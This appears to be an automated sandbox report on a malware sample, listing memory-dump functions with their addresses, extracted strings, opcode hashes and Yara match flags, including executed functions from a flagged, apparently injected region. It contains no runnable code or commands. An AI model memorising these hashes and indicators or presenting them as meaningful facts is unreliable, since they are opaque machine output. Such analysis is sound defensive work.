                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f292dce5f980c47b91c9e8635167fe1c02cb8c4d9874e66ca6e1fcf09648664b
                                                                      • Instruction ID: e35fdd491e058a21e76e9ed80daa582e767594742f8277473ee6755b1c1c4481
                                                                      • Opcode Fuzzy Hash: f292dce5f980c47b91c9e8635167fe1c02cb8c4d9874e66ca6e1fcf09648664b
                                                                      • Instruction Fuzzy Hash: D890026120191403D14075584809607408997D0302F55C011E20A4555ECE298D516235
                                                                      Function 01912E30 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ccfaf0dca669f94196f90ab1b5cb74b8c5d81d0ae286e97df0b268c7f297f90
                                                                      • Instruction ID: cc61072104e0a494718d1cbb3d63ec069f16b213c0c4f2126d9e4372f2c2d251
                                                                      • Opcode Fuzzy Hash: 1ccfaf0dca669f94196f90ab1b5cb74b8c5d81d0ae286e97df0b268c7f297f90
                                                                      • Instruction Fuzzy Hash: 2A90022130151402D10271584419606408DD7D1345F95C012E1464555DCA258A53A232
                                                                      Function 01913090 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c24132d40eafbeb9e2d58ddb5444e4213edfe70278910a11bfb1873daf4f0518
                                                                      • Instruction ID: 8ca857c9dce29302dbc70955ef8a43649800a11ed0baa6b27f66179fb106aa02
                                                                      • Opcode Fuzzy Hash: c24132d40eafbeb9e2d58ddb5444e4213edfe70278910a11bfb1873daf4f0518
                                                                      • Instruction Fuzzy Hash: 8E90022124151802D14071588419707408AD7D0601F55C011E0064554DCA168A6567B1
                                                                      Function 01913010 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f1fb8ec0eb5e79c3a5c9c504916fcbc5fe6bfb0bb930fc0bc5b215ad514d2bc
                                                                      • Instruction ID: 13bfb7239f598cf612cdb847425269391d0946b6d3c91e125e00646c630dbf63
                                                                      • Opcode Fuzzy Hash: 3f1fb8ec0eb5e79c3a5c9c504916fcbc5fe6bfb0bb930fc0bc5b215ad514d2bc
                                                                      • Instruction Fuzzy Hash: 8890022120195442D14072584809B0F818997E1202F95C019E4196554CCD1589555721
                                                                      Function 019139B0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c43e65e19b30ff00025d2e771bf6a0ffd3f7d15b1dd9b26f464e152161d4fa4
                                                                      • Instruction ID: 02bdb731919ef055a9ed1002214b2a03ba9d22e90c232a2c434ac4804029e9e6
                                                                      • Opcode Fuzzy Hash: 7c43e65e19b30ff00025d2e771bf6a0ffd3f7d15b1dd9b26f464e152161d4fa4
                                                                      • Instruction Fuzzy Hash: 9490022124556102D150715C44096168089B7E0201F55C021E0854594DC95589556321
                                                                      Function 01913D10 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ef8ad97f5760478e3732a81b170449686c4127defddb1ad250283e4275dfcf5
                                                                      • Instruction ID: 435adb37638af9ddcec81112d74ebca7b62b6fb608805b9af426fa31beb78160
                                                                      • Opcode Fuzzy Hash: 9ef8ad97f5760478e3732a81b170449686c4127defddb1ad250283e4275dfcf5
                                                                      • Instruction Fuzzy Hash: B590023120251142954072585809A4E818997E1302B95D415E0055554CCD1489615321
                                                                      Function 01913D70 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ef280e7efee234ff6011f7cbdf5cbf09c486291d5984ec6ccf647571470c4db
                                                                      • Instruction ID: 1be77c8b58b4f721472d0da7c22961322e117c4fb10317505738587c56fd6eb3
                                                                      • Opcode Fuzzy Hash: 9ef280e7efee234ff6011f7cbdf5cbf09c486291d5984ec6ccf647571470c4db
                                                                      • Instruction Fuzzy Hash: E190023520151402D5107158580964640CA97D0301F55D411E0464558DCA5489A1A221
                                                                      Function 01912C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction ID: 7c80b7ab3711f037dd0ef1fc78c2b6735df3258662362635a25640accb412a74
                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                      • Instruction Fuzzy Hash:
                                                                      Function 01912890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: da2f2cdeb9b691a006a212ac2c53cd19d2c3e5ed1fdd7a1e15aef72c7a892b83
                                                                      • Instruction ID: 1b33cda63415f5df6c9ef4acffec7eba6ab2969485ec0b8061baa2abddaf0a41
                                                                      • Opcode Fuzzy Hash: da2f2cdeb9b691a006a212ac2c53cd19d2c3e5ed1fdd7a1e15aef72c7a892b83
                                                                      • Instruction Fuzzy Hash: 5751F6B2A0011ABFDB11EF9C8980D7EFBB8BB482417648269F56DD7645D334DE9087E0
                                                                      Function 01982410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: cdaa211ae0432f3ede8af6873652f2492339946ccb318fdff16f4c75f59e4408
                                                                      • Instruction ID: 977c72c6a50282427e5d19b2d85d917fadd0285aa8625e0ec6d6f9f118660e7e
                                                                      • Opcode Fuzzy Hash: cdaa211ae0432f3ede8af6873652f2492339946ccb318fdff16f4c75f59e4408
                                                                      • Instruction Fuzzy Hash: 465105B5A40646AECB30EF6DC89087FBBFCEF44601B44886DE99AD7641E674DA00C770
                                                                      Function 01907630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01944725
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019446FC
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01944655
                                                                      • Execute=1, xrefs: 01944713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01944742
                                                                      • ExecuteOptions, xrefs: 019446A0
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01944787
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: fd6f289ee3bda6e65c7a4089a49258905241c99017f7dc3a4d45812fd0830762
                                                                      • Instruction ID: 4287afd5a308c5892f063b5161e192a9ccc96bdd5c2e90092dc10805f5b79643
                                                                      • Opcode Fuzzy Hash: fd6f289ee3bda6e65c7a4089a49258905241c99017f7dc3a4d45812fd0830762
                                                                      • Instruction Fuzzy Hash: E9513A3160020A6EEF16EAE8DC99FA937ACAF54364F040499D64EAB2C0D771AA41CF51
                                                                      Function 0191B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: 3e81f16af2048974a9415e22615c1d1c65324044b35f4214097a97c9ee8b346c
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: A981E270E0124D8EEF258E6CC8507FEBBB7AF54761F184959D85BA7699C73088C0CB61
                                                                      Function 019820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 3564507ae3bd86048becf2b5a8a681955a48d293105a47900c5b909617b0bb37
                                                                      • Instruction ID: d8645c9ac886648d15cdc7ed835cf4603c63420a52bb5451846776ab31fe5edc
                                                                      • Opcode Fuzzy Hash: 3564507ae3bd86048becf2b5a8a681955a48d293105a47900c5b909617b0bb37
                                                                      • Instruction Fuzzy Hash: 0421337AE00119ABDB11EF69D840AEE7BEDFF54654F54012AED09E3204E734DA11CBA1
                                                                      Function 018FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019402BD
                                                                      • RTL: Re-Waiting, xrefs: 0194031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019402E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: 942d8031762300fdfa9c7e169bedf4bc4e3e1d0380174c0ac68f462c5435a755
                                                                      • Instruction ID: b0e1b64db87b6dfdf3b870f559f3ca1fcf96797f9419b3321b96f062634f9d46
                                                                      • Opcode Fuzzy Hash: 942d8031762300fdfa9c7e169bedf4bc4e3e1d0380174c0ac68f462c5435a755
                                                                      • Instruction Fuzzy Hash: 2EE1AD316087419FE725CF28C884B6ABBE4BB88714F140A5DF7A9CB2E1D774DA44CB52
                                                                      Function 0190BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 01947BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01947B7F
                                                                      • RTL: Resource at %p, xrefs: 01947B8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: 7939dcd577c2586e4224cb6b044550249eb107a87250ea8efbd6e36f87e8add9
                                                                      • Instruction ID: 6f368dc5431eaf6aa1f83e1fb29547acb75d6383969365dc37731ab5e7693ba6
                                                                      • Opcode Fuzzy Hash: 7939dcd577c2586e4224cb6b044550249eb107a87250ea8efbd6e36f87e8add9
                                                                      • Instruction Fuzzy Hash: AB41E2353007069FD726DE29C840F6AB7E9EF99721F100A1DFA5ED7280DB31E9458B91
                                                                      Function 0190B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0194728C
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 019472C1
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01947294
                                                                      • RTL: Resource at %p, xrefs: 019472A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      • Opcode ID: d448363c9a7cb3b92219ed4434f236d4256e2c33b4eb9c3f570c64b5e6c8d8a2
                                                                      • Instruction ID: f07582dd293e5a262bf9e45df1493c5a6a363bf7f9abe67ecc8ea297538ff1ea
                                                                      • Opcode Fuzzy Hash: d448363c9a7cb3b92219ed4434f236d4256e2c33b4eb9c3f570c64b5e6c8d8a2
                                                                      • Instruction Fuzzy Hash: 7741F03570020AAFD725DE69CC41F6AB7A9FB94B11F100A19F95EEB280DB21E942C7D1
                                                                      Function 01982300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      • Opcode ID: 72219bfd6d4f5dbee5a198a5d252b1956f8d4b4874e9597e581eb0e34b8e4c66
                                                                      • Instruction ID: bcc7ba01586c21b53e480871eddabe8ef14d6e952462958bd7ffe736c03c2e99
                                                                      • Opcode Fuzzy Hash: 72219bfd6d4f5dbee5a198a5d252b1956f8d4b4874e9597e581eb0e34b8e4c66
                                                                      • Instruction Fuzzy Hash: 4D314376A002199FDB20DF29CC50BEEB7FCEB54A51F84455AE94DE3244EB30DA45CBA0
                                                                      Function 01917D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction ID: 37bc428a21ba18a67b9c63605abf65a821892a273b1b46006ad0350293224d89
                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                      • Instruction Fuzzy Hash: 95919771E0020F9AEB28DF9DC880ABF7BA9AF44321F54451AE95DE73D8D73099C08751
                                                                      Function 018D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      • Opcode ID: 6a29d6998b58d17e4f8373f40cf4745c6327dc1ad895499ec5070ff4a250bbd9
                                                                      • Instruction ID: c59f7f5475ea4946cfac5500dc1c92fb10fb43faf65090895056888cff6932d1
                                                                      • Opcode Fuzzy Hash: 6a29d6998b58d17e4f8373f40cf4745c6327dc1ad895499ec5070ff4a250bbd9
                                                                      • Instruction Fuzzy Hash: 09811A71D002699BDB35CB54CC45BEABBB8AF48754F0041EAEA1DB7280D7749E84CFA1
                                                                      Function 0195CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0195CFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      • Opcode ID: 1d10c335d8c6f1527648e6b149e11a1544b895e5d07aba1955d101334d079dba
                                                                      • Instruction ID: 4e201040c6e1c2d178a794cece74ac509ed67035cea1a66ca9de4fe28bc6dd67
                                                                      • Opcode Fuzzy Hash: 1d10c335d8c6f1527648e6b149e11a1544b895e5d07aba1955d101334d079dba
                                                                      • Instruction Fuzzy Hash: F741AC75900219DFDB21DFA9C880AAEBBF8FF95B50F00442AED49EB254D774D901CB62

                                                                      Executed Functions

                                                                      Function 03602C4B Relevance: 43.1, Strings: 34, Instructions: 564COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /$ R$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${z
                                                                      • API String ID: 0-2491054771
                                                                      • Opcode ID: 10742a4050c35eebbd12280d16efa6cfdff97d314789b4ec925bb3ac03b33fde
                                                                      • Instruction ID: d6c95687fdeb01751da899d2464c26e2bb6ed3d2aa9d5664ab947901d86e4e97
                                                                      • Opcode Fuzzy Hash: 10742a4050c35eebbd12280d16efa6cfdff97d314789b4ec925bb3ac03b33fde
                                                                      • Instruction Fuzzy Hash: 59629EB4D05669CBEB28CF45C9997DEBBB1BB84309F2081D9C4096B381C7B95AC9CF44
                                                                      Function 03610C2B Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$O$S$\$s
                                                                      • API String ID: 0-3854637164
                                                                      • Opcode ID: bc3f42afd454550bc4ccc942000e40d05f6a40246a6a819d5b27568d2bf33657
                                                                      • Instruction ID: ac2b791e1fa127e1a5d16b4b8b5fd57da042f37926cd9939c1e9dc7902275095
                                                                      • Opcode Fuzzy Hash: bc3f42afd454550bc4ccc942000e40d05f6a40246a6a819d5b27568d2bf33657
                                                                      • Instruction Fuzzy Hash: EE51A176D01218ABDB10EF95DC84AEFB778EF44314F188199ED096A240E774AB54CFA1
                                                                      Function 0361DF2B Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -G$Lf
                                                                      • API String ID: 0-1055479412
                                                                      • Opcode ID: 2a086cea9dcd58233613d66dc132dfadaa9582846f3feae5de54afd772069996
                                                                      • Instruction ID: 9e43227292ea962dd16d4471c9165982c4389baef36316b519d5559adbae4d52
                                                                      • Opcode Fuzzy Hash: 2a086cea9dcd58233613d66dc132dfadaa9582846f3feae5de54afd772069996
                                                                      • Instruction Fuzzy Hash: 1521F1F6D01219AF8B00DF99D9419EFBBF9FF88210F04825AE909E7204E7715A158BE5
                                                                      Function 035FC1EB Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e0c0e05a3180629457462458cf4218b8d1a134c4f0cc6191c10f26ff9f38bc0
                                                                      • Instruction ID: 7f376a5aca184ea3566f293e1fe47e1666235ad3e1083b5d08ff3def3c3293b1
                                                                      • Opcode Fuzzy Hash: 4e0c0e05a3180629457462458cf4218b8d1a134c4f0cc6191c10f26ff9f38bc0
                                                                      • Instruction Fuzzy Hash: CF410CB1D11229AFDB04CF99D881AEEBBBCFF49710F10415AFA14E6240E7B09641CBA4
                                                                      Function 03621C3B Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction ID: 690ad8e05f478e3b16890f9fa236eb423261d4b0a51413498d24438b36ea5261
                                                                      • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction Fuzzy Hash: A031E2B5A01648AFCB14DF98D881EEEBBB9AF88700F108109F909A7344D734A851CFA4
                                                                      Function 03621D9B Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction ID: bda04b9236d30a7654b3f67dc6849d3031d0faef3e380f675f6e25e9449be741
                                                                      • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction Fuzzy Hash: 94310A75A00649AFCB14DF98C881EEFBBB9EF88700F108109F918A7344D730A9128FA1
                                                                      Function 0362167B Relevance: .1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                      • Instruction ID: 462d65b33d5f870fbeac3f86364a74389c3a4333d8805641c300766764350056
                                                                      • Opcode Fuzzy Hash: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                      • Instruction Fuzzy Hash: E8313A75A00649AFDB14DF98CC81EEFBBB9EF88700F108119F908AB344D734A8118FA1
                                                                      Function 03621FBB Relevance: .1, Instructions: 77COMMON
                                                                      Download Yara Rule
